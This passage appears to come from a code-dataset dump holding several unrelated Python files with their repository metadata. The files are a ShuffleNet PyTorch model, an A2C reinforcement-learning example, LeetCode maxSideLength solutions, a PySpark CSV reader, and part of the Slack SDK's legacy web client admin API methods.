    """ShuffleNet unit: grouped 1x1 conv -> channel shuffle -> 3x3 depthwise conv -> grouped 1x1 conv.

    With stride=2 the shortcut is a 3x3 average pool whose output is
    concatenated with the main branch; with stride=1 the residual is added.
    """
    def __init__(self, in_planes, out_planes, stride, groups):
        super(Bottleneck, self).__init__()
        self.stride = stride
        # FIX: use floor division — '/' returns a float in Python 3, and
        # nn.Conv2d requires integer channel counts (TypeError otherwise).
        mid_planes = out_planes // 4
        # The first stage (24 input channels) uses an ungrouped 1x1 conv.
        g = 1 if in_planes == 24 else groups
        self.conv1 = nn.Conv2d(in_planes, mid_planes, kernel_size=1, groups=g, bias=False)
        self.bn1 = nn.BatchNorm2d(mid_planes)
        self.shuffle1 = ShuffleBlock(groups=g)
        # Depthwise 3x3 conv: groups == channels.
        self.conv2 = nn.Conv2d(mid_planes, mid_planes, kernel_size=3, stride=stride, padding=1, groups=mid_planes, bias=False)
        self.bn2 = nn.BatchNorm2d(mid_planes)
        self.conv3 = nn.Conv2d(mid_planes, out_planes, kernel_size=1, groups=groups, bias=False)
        self.bn3 = nn.BatchNorm2d(out_planes)
        self.shortcut = nn.Sequential()
        if stride == 2:
            self.shortcut = nn.Sequential(nn.AvgPool2d(3, stride=2, padding=1))
    def forward(self, x):
        out = F.relu(self.bn1(self.conv1(x)))
        out = self.shuffle1(out)
        out = F.relu(self.bn2(self.conv2(out)))
        out = self.bn3(self.conv3(out))
        res = self.shortcut(x)
        # Downsampling blocks concatenate (channel counts add); stride-1 blocks sum.
        out = F.relu(torch.cat([out, res], 1)) if self.stride == 2 else F.relu(out + res)
        return out
class ShuffleNet(nn.Module):
    """ShuffleNet for 32x32 inputs with 10 output classes.

    cfg keys: 'out_planes' (three stage widths), 'num_blocks' (three stage
    depths) and 'groups' (group count for the grouped 1x1 convolutions).
    """
    def __init__(self, cfg):
        super(ShuffleNet, self).__init__()
        widths = cfg['out_planes']
        depths = cfg['num_blocks']
        groups = cfg['groups']
        self.conv1 = nn.Conv2d(3, 24, kernel_size=1, bias=False)
        self.bn1 = nn.BatchNorm2d(24)
        self.in_planes = 24
        self.layer1 = self._make_layer(widths[0], depths[0], groups)
        self.layer2 = self._make_layer(widths[1], depths[1], groups)
        self.layer3 = self._make_layer(widths[2], depths[2], groups)
        self.linear = nn.Linear(widths[2], 10)
    def _make_layer(self, out_planes, num_blocks, groups):
        """Build one stage; only its first block downsamples (stride 2)."""
        blocks = []
        for idx in range(num_blocks):
            first = idx == 0
            # The first block's concat shortcut contributes self.in_planes
            # channels, so its main branch only produces the remainder.
            concat_planes = self.in_planes if first else 0
            blocks.append(Bottleneck(self.in_planes,
                                     out_planes - concat_planes,
                                     stride=2 if first else 1,
                                     groups=groups))
            self.in_planes = out_planes
        return nn.Sequential(*blocks)
    def forward(self, x):
        features = F.relu(self.bn1(self.conv1(x)))
        features = self.layer3(self.layer2(self.layer1(features)))
        pooled = F.avg_pool2d(features, 4)
        flat = pooled.view(pooled.size(0), -1)
        return self.linear(flat)
def ShuffleNetG2():
    """ShuffleNet configuration with 2 convolution groups."""
    return ShuffleNet({
        'out_planes': [200, 400, 800],
        'num_blocks': [4, 8, 4],
        'groups': 2,
    })
def ShuffleNetG3():
    """ShuffleNet configuration with 3 convolution groups."""
    return ShuffleNet({
        'out_planes': [240, 480, 960],
        'num_blocks': [4, 8, 4],
        'groups': 3,
    })
def test():
    """Smoke test: push one random CIFAR-sized batch through ShuffleNetG2."""
    net = ShuffleNetG2()
    sample = torch.randn(1, 3, 32, 32)
    print(net(sample))
# test()
| 32.2
| 126
| 0.604743
|
acff6f99beb5dde18138538b6168c8354c6f6df5
| 2,852
|
py
|
Python
|
examples/A2C.py
|
himanshusahni/Pytorch-RL
|
0d49f6e627f6e3449af2f958b3b03f41f973f355
|
[
"MIT"
] | null | null | null |
examples/A2C.py
|
himanshusahni/Pytorch-RL
|
0d49f6e627f6e3449af2f958b3b03f41f973f355
|
[
"MIT"
] | null | null | null |
examples/A2C.py
|
himanshusahni/Pytorch-RL
|
0d49f6e627f6e3449af2f958b3b03f41f973f355
|
[
"MIT"
] | null | null | null |
import argparse
import gym
import torch
import torchvision.transforms as transforms
import torch.multiprocessing as mp
from pytorch_rl import networks, utils, callbacks, agents, algorithms, policies
if __name__ == '__main__':
    parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('--max_train_steps',
                        help='maximum environment steps allowed for training',
                        type=int,
                        default=100000)
    parser.add_argument('--obs_size',
                        help='resize observations from environment',
                        type=int,
                        default=64)
    parser.add_argument('--gamma',
                        help='discount factor',
                        type=float,
                        default=0.99)
    parser.add_argument('--entropy_weighting',
                        help='entropy loss contribution',
                        type=float,
                        default=0.05)
    parser.add_argument('--nb_threads',
                        help='number of processes for collecting experience',
                        type=int,
                        default=5)
    parser.add_argument('--nb_rollout_steps',
                        help='steps per rollout for AC',
                        type=int,
                        default=10)
    parser.add_argument('--test_freq',
                        help='testing frequency',
                        type=int,
                        default=100)
    # FIX: args.env used to be unconditionally overwritten with 'Breakout-v4'
    # after parsing, silently ignoring a user-supplied --env. Keep the same
    # default behavior but honor the flag when given.
    parser.add_argument('--env',
                        help='environment name',
                        default='Breakout-v4')
    args = parser.parse_args()

    # first enable cuda memory sharing
    mp.set_start_method('spawn')

    def make_env():
        """Environment factory handed to each worker process."""
        return gym.make(args.env)

    env = make_env()
    args.observation_space = (3, args.obs_size, args.obs_size)
    args.action_space = env.action_space.n
    args.device = torch.device("cuda:1" if torch.cuda.is_available() else "cpu")

    policy_network = networks.ConvPolicy_64x64(args.action_space)
    value_network = networks.ConvValue_64x64()
    policy = policies.MultinomialPolicy

    # FIX: this list was previously named `callbacks`, shadowing the imported
    # pytorch_rl.callbacks module it is built from.
    callback_list = [callbacks.PrintCallback(freq=100), ]

    a2c = algorithms.A2C(policy_network, value_network, args)
    agent = agents.MultithreadedOnPolicyDiscreteAgent(
        algorithm=a2c,
        policy=policy,
        callbacks=callback_list,
        args=args)
    preprocess = transforms.Compose([utils.Resize((64, 64)), utils.ImgToTensor()])
    agent.train(make_env, preprocess)
    # TODO: verify on an easy environment.
| 39.068493
| 97
| 0.593619
|
acff7095397c157a2ee15736b186ea499a84c28e
| 2,146
|
py
|
Python
|
Python3/1292.py
|
rakhi2001/ecom7
|
73790d44605fbd51e8f7e804b9808e364fcfc680
|
[
"MIT"
] | 854
|
2018-11-09T08:06:16.000Z
|
2022-03-31T06:05:53.000Z
|
Python3/1292.py
|
rakhi2001/ecom7
|
73790d44605fbd51e8f7e804b9808e364fcfc680
|
[
"MIT"
] | 29
|
2019-06-02T05:02:25.000Z
|
2021-11-15T04:09:37.000Z
|
Python3/1292.py
|
rakhi2001/ecom7
|
73790d44605fbd51e8f7e804b9808e364fcfc680
|
[
"MIT"
] | 347
|
2018-12-23T01:57:37.000Z
|
2022-03-12T14:51:21.000Z
|
__________________________________________________________________________________________________
sample 672 ms submission
class Solution:
    def maxSideLength(self, mat: List[List[int]], threshold: int) -> int:
        """Return the side of the largest square submatrix whose sum is <= threshold.

        Maintains per-column sums over a sliding band of rows whose height
        tracks the current best answer, so each row only has to check
        whether a (best+1)-sized square exists ending at that row.
        """
        n_rows, n_cols = len(mat), len(mat[0])
        best = 0
        col_sums = [0] * n_cols
        for row in range(n_rows):
            # Extend the band of accumulated rows by one.
            for col in range(n_cols):
                col_sums[col] += mat[row][col]
            side = best + 1
            window_sum = sum(col_sums[:side])
            best_before = best
            if window_sum <= threshold:
                best = side
            else:
                # Slide the window of `side` columns across the band.
                for left in range(n_cols - side):
                    window_sum += col_sums[left + side] - col_sums[left]
                    if window_sum <= threshold:
                        best = side
                        break
            if best >= min(n_rows, n_cols):
                break
            if best_before == best:
                # No growth: drop the oldest row so the band height stays best+1.
                for col in range(n_cols):
                    col_sums[col] -= mat[row - best_before][col]
        return best
__________________________________________________________________________________________________
sample 688 ms submission
class Solution:
    def maxSideLength(self, mat: List[List[int]], threshold: int) -> int:
        """Largest k such that some k-by-k square of mat sums to at most threshold."""
        height, width = len(mat), len(mat[0])
        answer = 0
        column_totals = [0] * width
        for r, row_vals in enumerate(mat):
            # Fold this row into the running column totals.
            for c, v in enumerate(row_vals):
                column_totals[c] += v
            k = answer + 1
            running = sum(column_totals[:k])
            before = answer
            if running <= threshold:
                answer = k
            else:
                # Try every horizontal placement of a k-wide window.
                for start in range(width - k):
                    running -= column_totals[start]
                    running += column_totals[start + k]
                    if running <= threshold:
                        answer = k
                        break
            if answer >= min(height, width):
                break
            if before == answer:
                # Answer did not grow; evict the row leaving the band.
                for c in range(width):
                    column_totals[c] -= mat[r - before][c]
        return answer
__________________________________________________________________________________________________
| 35.180328
| 98
| 0.45247
|
acff725897b47240154de45609ff5972a15c1cf9
| 497
|
py
|
Python
|
Chapter19/PySpark_Codes/CSV_with_PySpark.py
|
sankumarbigdata/Scala-and-Spark-for-Big-Data-Analytics
|
e99ca192bcfb4bd9a4c3714ba047d6602922aac7
|
[
"MIT"
] | 33
|
2017-09-06T02:15:13.000Z
|
2021-12-10T13:11:18.000Z
|
Chapter19/PySpark_Codes/CSV_with_PySpark.py
|
sankumarbigdata/Scala-and-Spark-for-Big-Data-Analytics
|
e99ca192bcfb4bd9a4c3714ba047d6602922aac7
|
[
"MIT"
] | null | null | null |
Chapter19/PySpark_Codes/CSV_with_PySpark.py
|
sankumarbigdata/Scala-and-Spark-for-Big-Data-Analytics
|
e99ca192bcfb4bd9a4c3714ba047d6602922aac7
|
[
"MIT"
] | 56
|
2017-08-05T22:08:12.000Z
|
2022-03-27T14:10:19.000Z
|
import os
import sys
try:
    # Fail fast with a clear message when pyspark is not on the Python path.
    from pyspark.sql import SparkSession
    print("Successfully imported Spark Modules")
except ImportError as e:
    print("Can not import Spark Modules", e)
    sys.exit(1)
if __name__ == "__main__":
    # Build (or reuse) a SparkSession for this example job.
    spark = SparkSession.builder.appName("PCAExample").getOrCreate()
    # NOTE(review): input path is hard-coded to a Windows location — confirm before reuse.
    reader = spark.read.format("com.databricks.spark.csv").option("header", "true")
    df = reader.load("C:/Exp/nycflights13.csv")
    df.printSchema()
    df.show()
    spark.stop()
| 18.407407
| 111
| 0.647887
|
acff72a0191234f0d8cd5bac76ff55db9508f099
| 109,962
|
py
|
Python
|
slack_sdk/web/legacy_client.py
|
y-adachi-00one/python-slack-sdk
|
8f65b9410e04be351b98f6b551b5edfb456b1de2
|
[
"MIT"
] | null | null | null |
slack_sdk/web/legacy_client.py
|
y-adachi-00one/python-slack-sdk
|
8f65b9410e04be351b98f6b551b5edfb456b1de2
|
[
"MIT"
] | null | null | null |
slack_sdk/web/legacy_client.py
|
y-adachi-00one/python-slack-sdk
|
8f65b9410e04be351b98f6b551b5edfb456b1de2
|
[
"MIT"
] | null | null | null |
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
#
# *** DO NOT EDIT THIS FILE ***
#
# 1) Modify slack_sdk/web/client.py
# 2) Run `python setup.py codegen`
#
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
from asyncio import Future
"""A Python module for interacting with Slack's Web API."""
import os
from io import IOBase
from typing import Union, Sequence, Optional, Dict, Tuple
import slack_sdk.errors as e
from slack_sdk.models.views import View
from .legacy_base_client import LegacyBaseClient, SlackResponse
from .internal_utils import (
_parse_web_class_objects,
_update_call_participants,
_warn_if_text_is_missing,
)
class LegacyWebClient(LegacyBaseClient):
"""A WebClient allows apps to communicate with the Slack Platform's Web API.
https://api.slack.com/methods
The Slack Web API is an interface for querying information from
and enacting change in a Slack workspace.
This client handles constructing and sending HTTP requests to Slack
as well as parsing any responses received into a `SlackResponse`.
Attributes:
token (str): A string specifying an xoxp or xoxb token.
base_url (str): A string representing the Slack API base URL.
Default is 'https://www.slack.com/api/'
timeout (int): The maximum number of seconds the client will wait
to connect and receive a response from Slack.
Default is 30 seconds.
Methods:
api_call: Constructs a request and executes the API call to Slack.
Example of recommended usage:
```python
import os
from slack_sdk.web.legacy_client import LegacyWebClient
client = LegacyWebClient(token=os.environ['SLACK_API_TOKEN'])
response = client.chat_postMessage(
channel='#random',
text="Hello world!")
assert response["ok"]
assert response["message"]["text"] == "Hello world!"
```
Example manually creating an API request:
```python
import os
from slack_sdk.web.legacy_client import LegacyWebClient
client = LegacyWebClient(token=os.environ['SLACK_API_TOKEN'])
response = client.api_call(
api_method='chat.postMessage',
json={'channel': '#random','text': "Hello world!"}
)
assert response["ok"]
assert response["message"]["text"] == "Hello world!"
```
Note:
Any attributes or methods prefixed with _underscores are
intended to be "private" internal use only. They may be changed or
removed at anytime.
"""
    def admin_analytics_getFile(
        self,
        *,
        type: str,
        date: Optional[str] = None,
        metadata_only: Optional[bool] = None,
        **kwargs
    ) -> Union[Future, SlackResponse]:
        """Retrieve analytics data for a given date, presented as a compressed JSON file
        Args:
            date (str): Date to retrieve the analytics data for,
                expressed as YYYY-MM-DD in UTC.
            type (str): The type of analytics to retrieve.
                The options are currently limited to member.
            metadata_only (bool): When true, return only metadata for the file.
        """
        kwargs.update({"type": type})
        if date is not None:
            kwargs.update({"date": date})
        if metadata_only is not None:
            kwargs.update({"metadata_only": metadata_only})
        return self.api_call("admin.analytics.getFile", params=kwargs)
    def admin_apps_approve(
        self, *, app_id: Optional[str] = None, request_id: Optional[str] = None, **kwargs
    ) -> Union[Future, SlackResponse]:
        """Approve an app for installation on a workspace.
        Either app_id or request_id is required.
        These IDs can be obtained either directly via the app_requested event,
        or by the admin.apps.requests.list method.
        Args:
            app_id (str): The id of the app to approve. e.g. 'A12345'
            request_id (str): The id of the request to approve. e.g. 'Ar12345'
        Raises:
            SlackRequestError: If neither or both the `app_id` and `request_id` args are specified.
        """
        # app_id takes precedence when both are supplied.
        if app_id:
            kwargs.update({"app_id": app_id})
        elif request_id:
            kwargs.update({"request_id": request_id})
        else:
            raise e.SlackRequestError(
                "The app_id or request_id argument must be specified."
            )
        return self.api_call("admin.apps.approve", json=kwargs)
    def admin_apps_approved_list(self, **kwargs) -> Union[Future, SlackResponse]:
        """List approved apps for an org or workspace."""
        return self.api_call("admin.apps.approved.list", http_verb="GET", params=kwargs)
    def admin_apps_clearResolution(
        self, *, app_id: str, **kwargs
    ) -> Union[Future, SlackResponse]:
        """Clear an app resolution
        Args:
            app_id (str): The id of the app whose resolution you want to clear/undo.
        """
        kwargs.update({"app_id": app_id})
        return self.api_call(
            "admin.apps.clearResolution", http_verb="POST", params=kwargs
        )
    def admin_apps_requests_list(self, **kwargs) -> Union[Future, SlackResponse]:
        """List app requests for a team/workspace."""
        return self.api_call("admin.apps.requests.list", http_verb="GET", params=kwargs)
    def admin_apps_restrict(self, **kwargs) -> Union[Future, SlackResponse]:
        """Restrict an app for installation on a workspace."""
        return self.api_call("admin.apps.restrict", json=kwargs)
    def admin_apps_restricted_list(self, **kwargs) -> Union[Future, SlackResponse]:
        """List restricted apps for an org or workspace."""
        return self.api_call(
            "admin.apps.restricted.list", http_verb="GET", params=kwargs
        )
    def admin_apps_uninstall(
        self,
        *,
        app_id: str,
        enterprise_id: Optional[str] = None,
        team_ids: Optional[Union[str, Sequence[str]]] = None,
        **kwargs
    ) -> Union[Future, SlackResponse]:
        """Uninstall an app from one or many workspaces, or an entire enterprise organization."""
        kwargs.update({"app_id": app_id})
        if enterprise_id is not None:
            kwargs.update({"enterprise_id": enterprise_id})
        if team_ids is not None:
            # Accept either a comma-separated string or a sequence of team IDs.
            if isinstance(team_ids, (list, Tuple)):
                kwargs.update({"team_ids": ",".join(team_ids)})
            else:
                kwargs.update({"team_ids": team_ids})
        return self.api_call("admin.apps.uninstall", http_verb="POST", params=kwargs)
    def admin_auth_policy_getEntities(
        self,
        *,
        policy_name: str,
        cursor: Optional[str] = None,
        entity_type: Optional[str] = None,
        limit: Optional[int] = None,
        **kwargs
    ) -> Union[Future, SlackResponse]:
        """Fetch all the entities assigned to a particular authentication policy by name."""
        kwargs.update({"policy_name": policy_name})
        if cursor is not None:
            kwargs.update({"cursor": cursor})
        if entity_type is not None:
            kwargs.update({"entity_type": entity_type})
        if limit is not None:
            kwargs.update({"limit": limit})
        return self.api_call(
            "admin.auth.policy.getEntities", http_verb="POST", params=kwargs
        )
    def admin_auth_policy_assignEntities(
        self,
        *,
        entity_ids: Union[str, Sequence[str]],
        policy_name: str,
        entity_type: str,
        **kwargs
    ) -> Union[Future, SlackResponse]:
        """Assign entities to a particular authentication policy."""
        # Accept either a comma-separated string or a sequence of entity IDs.
        if isinstance(entity_ids, (list, Tuple)):
            kwargs.update({"entity_ids": ",".join(entity_ids)})
        else:
            kwargs.update({"entity_ids": entity_ids})
        kwargs.update({"policy_name": policy_name})
        kwargs.update({"entity_type": entity_type})
        return self.api_call(
            "admin.auth.policy.assignEntities", http_verb="POST", params=kwargs
        )
    def admin_auth_policy_removeEntities(
        self,
        *,
        entity_ids: Union[str, Sequence[str]],
        policy_name: str,
        entity_type: str,
        **kwargs
    ) -> Union[Future, SlackResponse]:
        """Remove specified entities from a specified authentication policy."""
        if isinstance(entity_ids, (list, Tuple)):
            kwargs.update({"entity_ids": ",".join(entity_ids)})
        else:
            kwargs.update({"entity_ids": entity_ids})
        kwargs.update({"policy_name": policy_name})
        kwargs.update({"entity_type": entity_type})
        return self.api_call(
            "admin.auth.policy.removeEntities", http_verb="POST", params=kwargs
        )
    def admin_barriers_create(
        self,
        *,
        barriered_from_usergroup_ids: Union[str, Sequence[str]],
        primary_usergroup_id: str,
        restricted_subjects: Union[str, Sequence[str]],
        **kwargs
    ) -> Union[Future, SlackResponse]:
        """Create an Information Barrier"""
        kwargs.update({"primary_usergroup_id": primary_usergroup_id})
        # Sequence arguments are serialized as comma-separated strings for the API.
        if isinstance(barriered_from_usergroup_ids, (list, Tuple)):
            kwargs.update(
                {"barriered_from_usergroup_ids": ",".join(barriered_from_usergroup_ids)}
            )
        else:
            kwargs.update(
                {"barriered_from_usergroup_ids": barriered_from_usergroup_ids}
            )
        if isinstance(restricted_subjects, (list, Tuple)):
            kwargs.update({"restricted_subjects": ",".join(restricted_subjects)})
        else:
            kwargs.update({"restricted_subjects": restricted_subjects})
        return self.api_call("admin.barriers.create", http_verb="POST", params=kwargs)
    def admin_barriers_delete(
        self, *, barrier_id: str, **kwargs
    ) -> Union[Future, SlackResponse]:
        """Delete an existing Information Barrier"""
        kwargs.update({"barrier_id": barrier_id})
        return self.api_call("admin.barriers.delete", http_verb="POST", params=kwargs)
    def admin_barriers_update(
        self,
        *,
        barrier_id: str,
        barriered_from_usergroup_ids: Union[str, Sequence[str]],
        primary_usergroup_id: str,
        restricted_subjects: Union[str, Sequence[str]],
        **kwargs
    ) -> Union[Future, SlackResponse]:
        """Update an existing Information Barrier"""
        kwargs.update(
            {"barrier_id": barrier_id, "primary_usergroup_id": primary_usergroup_id}
        )
        if isinstance(barriered_from_usergroup_ids, (list, Tuple)):
            kwargs.update(
                {"barriered_from_usergroup_ids": ",".join(barriered_from_usergroup_ids)}
            )
        else:
            kwargs.update(
                {"barriered_from_usergroup_ids": barriered_from_usergroup_ids}
            )
        if isinstance(restricted_subjects, (list, Tuple)):
            kwargs.update({"restricted_subjects": ",".join(restricted_subjects)})
        else:
            kwargs.update({"restricted_subjects": restricted_subjects})
        return self.api_call("admin.barriers.update", http_verb="POST", params=kwargs)
    def admin_barriers_list(self, **kwargs) -> Union[Future, SlackResponse]:
        """Get all Information Barriers for your organization"""
        return self.api_call("admin.barriers.list", http_verb="GET", params=kwargs)
def admin_conversations_create(
self, *, is_private: bool, name: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Create a public or private channel-based conversation.
Args:
is_private (bool): When true, creates a private channel instead of a public channel
name (str): Name of the public or private channel to create.
org_wide (bool): When true, the channel will be available org-wide.
Note: if the channel is not org_wide=true, you must specify a team_id for this channel
team_id (str): The workspace to create the channel in.
Note: this argument is required unless you set org_wide=true.
"""
kwargs.update({"is_private": is_private, "name": name})
return self.api_call("admin.conversations.create", json=kwargs)
def admin_conversations_delete(
self, *, channel_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Delete a public or private channel.
Args:
channel_id (str): The channel to delete.
"""
kwargs.update({"channel_id": channel_id})
return self.api_call("admin.conversations.delete", json=kwargs)
def admin_conversations_invite(
self, *, channel_id: str, user_ids: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Invite a user to a public or private channel.
Args:
channel_id (str): The channel that the users will be invited to.
user_ids (str or list): The users to invite.
"""
kwargs.update({"channel_id": channel_id})
if isinstance(user_ids, (list, Tuple)):
kwargs.update({"user_ids": ",".join(user_ids)})
else:
kwargs.update({"user_ids": user_ids})
# NOTE: the endpoint is unable to handle Content-Type: application/json as of Sep 3, 2020.
return self.api_call("admin.conversations.invite", params=kwargs)
def admin_conversations_archive(
self, *, channel_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Archive a public or private channel.
Args:
channel_id (str): The channel to archive.
"""
kwargs.update({"channel_id": channel_id})
return self.api_call("admin.conversations.archive", json=kwargs)
def admin_conversations_unarchive(
self, *, channel_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Unarchive a public or private channel.
Args:
channel_id (str): The channel to unarchive.
"""
kwargs.update({"channel_id": channel_id})
return self.api_call("admin.conversations.unarchive", json=kwargs)
def admin_conversations_rename(
self, *, channel_id: str, name: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Rename a public or private channel.
Args:
channel_id (str): The channel to rename.
name (str): The name to rename the channel to.
"""
kwargs.update({"channel_id": channel_id, "name": name})
return self.api_call("admin.conversations.rename", json=kwargs)
def admin_conversations_search(self, **kwargs) -> Union[Future, SlackResponse]:
"""Search for public or private channels in an Enterprise organization."""
return self.api_call("admin.conversations.search", params=kwargs)
def admin_conversations_convertToPrivate(
self, *, channel_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Convert a public channel to a private channel.
Args:
channel_id (str): The channel to convert to private.
"""
kwargs.update({"channel_id": channel_id})
return self.api_call("admin.conversations.convertToPrivate", json=kwargs)
def admin_conversations_setConversationPrefs(
self, *, channel_id: str, prefs: Union[str, dict], **kwargs
) -> Union[Future, SlackResponse]:
"""Set the posting permissions for a public or private channel.
Args:
channel_id (str): The channel to set the prefs for
prefs (str or dict): The prefs for this channel in a stringified JSON format.
"""
kwargs.update({"channel_id": channel_id, "prefs": prefs})
return self.api_call("admin.conversations.setConversationPrefs", json=kwargs)
def admin_conversations_getConversationPrefs(
    self, *, channel_id: str, **kwargs
) -> Union[Future, SlackResponse]:
    """Get conversation preferences for a public or private channel.

    Args:
        channel_id (str): The channel to get the preferences for.
    """
    # Merge the required id into the extra arguments and send as the JSON body.
    payload = dict(kwargs, channel_id=channel_id)
    return self.api_call("admin.conversations.getConversationPrefs", json=payload)
def admin_conversations_disconnectShared(
    self, *, channel_id: str, **kwargs
) -> Union[Future, SlackResponse]:
    """Disconnect a connected channel from one or more workspaces.

    Args:
        channel_id (str): The channel to be disconnected from some workspaces.
    """
    # Merge the required id into the extra arguments and send as the JSON body.
    payload = {**kwargs, "channel_id": channel_id}
    return self.api_call("admin.conversations.disconnectShared", json=payload)
def admin_conversations_ekm_listOriginalConnectedChannelInfo(
self, **kwargs
) -> Union[Future, SlackResponse]:
"""List all disconnected channels—i.e.,
channels that were once connected to other workspaces and then disconnected—and
the corresponding original channel IDs for key revocation with EKM.
"""
return self.api_call(
"admin.conversations.ekm.listOriginalConnectedChannelInfo", params=kwargs
)
def admin_conversations_restrictAccess_addGroup(
self, *, channel_id: str, group_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Add an allowlist of IDP groups for accessing a channel.
Args:
channel_id (str): The channel to link this group to. e.g. 'C1234567890'
group_id (str): The IDP Group ID to be an allowlist for the private channel. 'S0604QSJC'
team_id (str): The workspace where the channel exists.
This argument is required for channels only tied to one workspace,
and optional for channels that are shared across an organization.
e.g 'T1234'
"""
kwargs.update({"channel_id": channel_id, "group_id": group_id})
return self.api_call(
"admin.conversations.restrictAccess.addGroup",
http_verb="GET",
params=kwargs,
)
def admin_conversations_restrictAccess_listGroups(
self, *, channel_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""List all IDP Groups linked to a channel.
Args:
channel_id (str): The channel to link this group to. e.g. 'C1234567890'
team_id (str): The workspace where the channel exists.
This argument is required for channels only tied to one workspace,
and optional for channels that are shared across an organization.
e.g 'T1234'
"""
kwargs.update({"channel_id": channel_id})
return self.api_call(
"admin.conversations.restrictAccess.listGroups",
http_verb="GET",
params=kwargs,
)
def admin_conversations_restrictAccess_removeGroup(
self, *, channel_id: str, group_id: str, team_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Remove a linked IDP group linked from a private channel.
Args:
channel_id (str): The channel to link this group to. e.g. 'C1234567890'
group_id (str): The IDP Group ID to be an allowlist for the private channel. 'S0604QSJC'
team_id (str): The workspace where the channel exists.
This argument is required for channels only tied to one workspace,
and optional for channels that are shared across an organization.
e.g 'T1234'
"""
kwargs.update(
{"channel_id": channel_id, "group_id": group_id, "team_id": team_id}
)
return self.api_call(
"admin.conversations.restrictAccess.removeGroup",
http_verb="GET",
params=kwargs,
)
def admin_conversations_setTeams(
    self, *, channel_id: str, **kwargs
) -> Union[Future, SlackResponse]:
    """Set the workspaces in an Enterprise grid org that connect to a channel.

    Args:
        channel_id (str): The encoded channel_id to add or remove to workspaces.
    """
    # Merge the required id into the extra arguments and send as the JSON body.
    payload = dict(kwargs, channel_id=channel_id)
    return self.api_call("admin.conversations.setTeams", json=payload)
def admin_conversations_getTeams(
    self, *, channel_id: str, **kwargs
) -> Union[Future, SlackResponse]:
    """Get the workspaces in an Enterprise grid org connected to a channel.

    Args:
        channel_id (str): The channel to determine connected workspaces within the organization for.
    """
    kwargs.update({"channel_id": channel_id})
    return self.api_call("admin.conversations.getTeams", params=kwargs)
def admin_emoji_add(self, **kwargs) -> Union[Future, SlackResponse]:
"""Add an emoji."""
return self.api_call("admin.emoji.add", http_verb="GET", params=kwargs)
def admin_emoji_addAlias(self, **kwargs) -> Union[Future, SlackResponse]:
"""Add an emoji alias."""
return self.api_call("admin.emoji.addAlias", http_verb="GET", params=kwargs)
def admin_emoji_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""List emoji for an Enterprise Grid organization."""
return self.api_call("admin.emoji.list", http_verb="GET", params=kwargs)
def admin_emoji_remove(self, **kwargs) -> Union[Future, SlackResponse]:
"""Remove an emoji across an Enterprise Grid organization."""
return self.api_call("admin.emoji.remove", http_verb="GET", params=kwargs)
def admin_emoji_rename(self, **kwargs) -> Union[Future, SlackResponse]:
"""Rename an emoji."""
return self.api_call("admin.emoji.rename", http_verb="GET", params=kwargs)
def admin_users_session_reset(
    self, *, user_id: str, **kwargs
) -> Union[Future, SlackResponse]:
    """Wipe all valid sessions on all devices for a given user.

    Args:
        user_id (str): The ID of the user to wipe sessions for. e.g. 'W12345678'
    """
    # Merge the required id into the extra arguments and send as the JSON body.
    payload = {**kwargs, "user_id": user_id}
    return self.api_call("admin.users.session.reset", json=payload)
def admin_users_session_invalidate(
self, *, session_id: str, team_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Invalidate a single session for a user by session_id.
Args:
session_id (str): The ID of a session
team_id (str): ID of the team that the session belongs to
"""
kwargs.update({"session_id": session_id, "team_id": team_id})
return self.api_call("admin.users.session.invalidate", params=kwargs)
def admin_users_session_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists all active user sessions for an organization"""
return self.api_call("admin.users.session.list", params=kwargs)
def admin_teams_settings_setDefaultChannels(
self, *, team_id: str, channel_ids: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Set the default channels of a workspace.
Args:
team_id (str): ID of the team.
channel_ids (str or list): A list of channel_ids.
At least one channel is required. e.g. ['C1A2B3C4D', 'C26Z25Y24']
"""
kwargs.update({"team_id": team_id})
if isinstance(channel_ids, (list, Tuple)):
kwargs.update({"channel_ids": ",".join(channel_ids)})
else:
kwargs.update({"channel_ids": channel_ids})
return self.api_call(
"admin.teams.settings.setDefaultChannels", http_verb="GET", params=kwargs
)
def admin_users_session_getSettings(
self, *, user_ids: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Get user-specific session settings—the session duration
and what happens when the client closes—given a list of users.
Args:
user_ids (str or list): The IDs of users you'd like to fetch session settings for.
Note: if a user does not have any active sessions, they will not be returned in the response.
"""
if isinstance(user_ids, (list, Tuple)):
kwargs.update({"user_ids": ",".join(user_ids)})
else:
kwargs.update({"user_ids": user_ids})
return self.api_call("admin.users.session.getSettings", params=kwargs)
def admin_users_session_setSettings(
self, *, user_ids: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Configure the user-level session settings—the session duration
and what happens when the client closes—for one or more users.
Args:
user_ids (str or list): The list of user IDs to apply the session settings for.
"""
if isinstance(user_ids, (list, Tuple)):
kwargs.update({"user_ids": ",".join(user_ids)})
else:
kwargs.update({"user_ids": user_ids})
return self.api_call("admin.users.session.setSettings", params=kwargs)
def admin_users_session_clearSettings(
self, *, user_ids: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Clear user-specific session settings—the session duration
and what happens when the client closes—for a list of users.
Args:
user_ids (str or list): The list of user IDs to apply the session settings for.
"""
if isinstance(user_ids, (list, Tuple)):
kwargs.update({"user_ids": ",".join(user_ids)})
else:
kwargs.update({"user_ids": user_ids})
return self.api_call("admin.users.session.clearSettings", params=kwargs)
def admin_inviteRequests_approve(
self, *, invite_request_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Approve a workspace invite request.
